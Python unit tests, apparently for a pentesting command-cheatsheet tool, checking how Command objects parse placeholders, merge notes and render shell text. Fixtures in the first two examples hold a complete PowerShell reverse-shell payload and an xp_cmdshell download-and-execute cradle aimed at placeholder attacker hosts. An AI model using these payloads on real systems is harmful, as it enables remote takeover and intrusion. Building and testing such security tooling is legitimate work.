Exemplo n.º 1
 def test_append(cls):
     """Check that appending a list of two Command objects yields a CommandList of length 2."""
     commands = CommandList()
     # Fixture text only: both entries are command templates that still carry
     # their #{...} placeholders. This test constructs and counts them; it
     # never inspects or renders their content.
     tcp_client_template = Command(
         """$client = New-Object System.Net.Sockets.TCPClient("#{LHOST}",#{LPORT});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"""
     )
     mssql_template = Command(
         """mssqlclient.py #{DOMAIN}/#{USER}@#{RHOST} -windows-auth""")
     batch = [tcp_client_template, mssql_template]
     # append() is handed the whole list here, and the expected length is the
     # number of items in it, not 1.
     commands.append(batch)
     assert len(commands) == 2
Exemplo n.º 2
 def create_cmdlist(cls):
     """Build the shared fixture: a SplitLine followed by three Command templates.

     Returns:
         The populated CommandList. Every command keeps its raw #{...}
         placeholders; nothing is substituted here.
     """
     cmdlist = CommandList()

     # NOTE(review): the section label says 'Sqlmap' while the entries below are
     # mssqlclient.py / xp_cmdshell / PowerShell templates - confirm the label.
     section = SplitLine('Sqlmap')
     cmdlist.append(section)

     mssql_login = Command(
         'mssqlclient.py #{DOMAIN}/#{USER}@#{RHOST} -windows-auth')
     cmdlist.append(mssql_login)

     # The trailing "" is an adjacent empty literal; it adds nothing to the value.
     download_cradle = Command(
         """xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://#{LHOST}:#{LPORT}/#{file}\");"""
         "")
     cmdlist.append(download_cradle)

     tcp_client_template = Command(
         """$client = New-Object System.Net.Sockets.TCPClient("#{LHOST}",#{LPORT});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"""
     )
     cmdlist.append(tcp_client_template)

     return cmdlist
Exemplo n.º 3
    def test_parse(cls):
        """Check that parse() records each distinct #{NAME} placeholder once, in first-seen order."""
        cmd = Command(
            'mssqlclient.py #{DOMAIN}/#{USER}@#{RHOST} -windows-auth')
        cmd.parse()

        # The expected text is the repr of the key view, so the check is tied to
        # the container type (presumably an OrderedDict, given "odict_keys").
        keys_after_first_parse = "odict_keys(['DOMAIN', 'USER', 'RHOST'])"
        assert len(cmd.vars) == 3
        assert str(cmd.vars.list.keys()) == keys_after_first_parse

        # The second line reuses RHOST and introduces `type`: only one new
        # variable is expected after re-parsing.
        cmd.add_cmd("host -t #{type} #{RHOST}")
        cmd.parse()

        keys_after_second_parse = "odict_keys(['DOMAIN', 'USER', 'RHOST', 'type'])"
        assert len(cmd.vars) == 4
        assert str(cmd.vars.list.keys()) == keys_after_second_parse
Exemplo n.º 4
    def test_to_shell(cls):
        """Check both renderings of to_shell(): newline-joined by default, ' && '-joined with one_line=True.

        In both cases the expected text keeps the raw #{...} placeholders.
        """
        cmd = Command(
            'mssqlclient.py #{DOMAIN}/#{USER}@#{RHOST} -windows-auth')
        cmd.add_cmd("host -t #{type} #{RHOST}")

        expected_multiline = 'mssqlclient.py #{DOMAIN}/#{USER}@#{RHOST} -windows-auth\nhost -t #{type} #{RHOST}'
        rendered = cmd.to_shell()
        assert rendered == expected_multiline

        # With ' && ' chaining a shell runs the second command only when the
        # first one exits successfully.
        expected_one_line = 'mssqlclient.py #{DOMAIN}/#{USER}@#{RHOST} -windows-auth && host -t #{type} #{RHOST}'
        rendered_one_line = cmd.to_shell(one_line=True)
        assert rendered_one_line == expected_one_line
Exemplo n.º 5
    def test_merge_var(cls):
        """Check that merge_var() enriches variables the command already has and adds no new ones."""
        cmd = Command(
            'mssqlclient.py #{DOMAIN}/#{USER}@#{RHOST} -windows-auth')
        cmd.parse()

        # One entry matches a parsed placeholder (RHOST); the other (IP) does
        # not appear in the command at all.
        descriptions = VariableList()
        for entry in (
            {'name': 'RHOST', 'func': 'desc', 'value': 'remote host'},
            {'name': 'IP', 'func': 'desc', 'value': 'ip'},
        ):
            descriptions.set(entry)

        cmd.merge_var(descriptions)

        # Still DOMAIN, USER, RHOST: the unknown IP entry must not leak in.
        assert len(cmd.vars) == 3
        assert cmd.vars['RHOST'].desc == 'remote host'
        assert 'IP' not in cmd.vars
Exemplo n.º 6
    def test_merge_note(cls):
        """Check how merge_notes() combines incoming notes with those already on a Command.

        Expected outcome: desc is replaced, the merged plain note lands at the
        front of notes, and the merged link/refer entries land at the end.
        """
        cmd = Command(
            'mssqlclient.py #{DOMAIN}/#{USER}@#{RHOST} -windows-auth')
        existing = (
            'desc: this is description',
            'refer: this is refer',
            'refer: this is refer 2',
            'link: this is link',
            'link: this is link 2',
            'this is note',
            'this is note 2',
        )
        for text in existing:
            cmd.add_note(text)

        incoming = [
            'desc: this is merge description', 'refer: this is merge refer',
            'link: this is merge link', 'this is merge note'
        ]
        cmd.merge_notes(incoming)

        # Two pre-existing entries plus one merged entry in each collection.
        assert len(cmd.notes) == 3
        assert len(cmd.links) == 3
        assert len(cmd.refer) == 3
        assert cmd.desc == 'this is merge description'
        assert cmd.notes[0] == 'this is merge note'
        # Only plain notes are flipped to the front; links and refer keep
        # append order, so the merged entry is last.
        assert cmd.links[2] == 'this is merge link'
        assert cmd.refer[2] == 'this is merge refer'
Exemplo n.º 7
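 def test_base(cls):
     """Check that constructing a Command from one line stores exactly one command entry."""
     cmd = Command(
         'mssqlclient.py #{DOMAIN}/#{USER}@#{RHOST} -windows-auth')
     # The original line was a bare `cmd.cmd == '<string>'` comparison with no
     # `assert`, so this test could never fail. test_add_cmd asserts
     # len(cmd.cmd) == 1 for the same constructor call, so cmd.cmd is not the
     # raw string itself; assert the entry count instead.
     # TODO(review): also pin the stored text once the element type of cmd.cmd
     # is confirmed.
     assert len(cmd.cmd) == 1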
Exemplo n.º 8
 def test_add_link(cls):
     """Check that add_link() stores the given link path as the only entry of cmd.links."""
     link_path = 'pentesting/recon/dns_lookup'
     cmd = Command(
         'mssqlclient.py #{DOMAIN}/#{USER}@#{RHOST} -windows-auth')

     cmd.add_link(link_path)

     # Exactly one link, stored verbatim.
     assert len(cmd.links) == 1
     assert cmd.links[0] == link_path
Exemplo n.º 9
 def test_add_refer(cls):
     """Check that add_refer() stores the given reference URL as the only entry of cmd.refer."""
     reference_url = 'https://book.hacktricks.xyz/pentesting'
     cmd = Command(
         'mssqlclient.py #{DOMAIN}/#{USER}@#{RHOST} -windows-auth')

     cmd.add_refer(reference_url)

     # Exactly one reference, stored verbatim.
     assert len(cmd.refer) == 1
     assert cmd.refer[0] == reference_url
Exemplo n.º 10
    def test_add_note(cls):
        """Check that add_note() routes text by its 'desc:' / 'refer:' / 'link:' prefix.

        Prefixed text is expected in desc, refer and links with the prefix
        removed; unprefixed text is expected in notes.
        """
        cmd = Command(
            'mssqlclient.py #{DOMAIN}/#{USER}@#{RHOST} -windows-auth')
        entries = (
            'desc: this is description',
            'refer: this is refer',
            'refer: this is refer 2',
            'link: this is link',
            'link: this is link 2',
            'this is note',
            'this is note 2',
        )
        for text in entries:
            cmd.add_note(text)

        # Two entries per list-valued bucket; desc holds a single value.
        assert len(cmd.notes) == 2
        assert len(cmd.refer) == 2
        assert len(cmd.links) == 2
        assert cmd.desc == 'this is description'
        # The first item of each bucket is the first one added.
        assert cmd.refer[0] == 'this is refer'
        assert cmd.links[0] == 'this is link'
        assert cmd.notes[0] == 'this is note'
Exemplo n.º 11
 def test_add_cmd(cls):
     """Check that add_cmd() grows cmd.cmd from one entry to two."""
     cmd = Command(
         'mssqlclient.py #{DOMAIN}/#{USER}@#{RHOST} -windows-auth')
     # The constructor argument counts as the first entry.
     count_before = len(cmd.cmd)
     assert count_before == 1

     cmd.add_cmd("select IS_SRVROLEMEMBER('sysadmin')")

     count_after = len(cmd.cmd)
     assert count_after == 2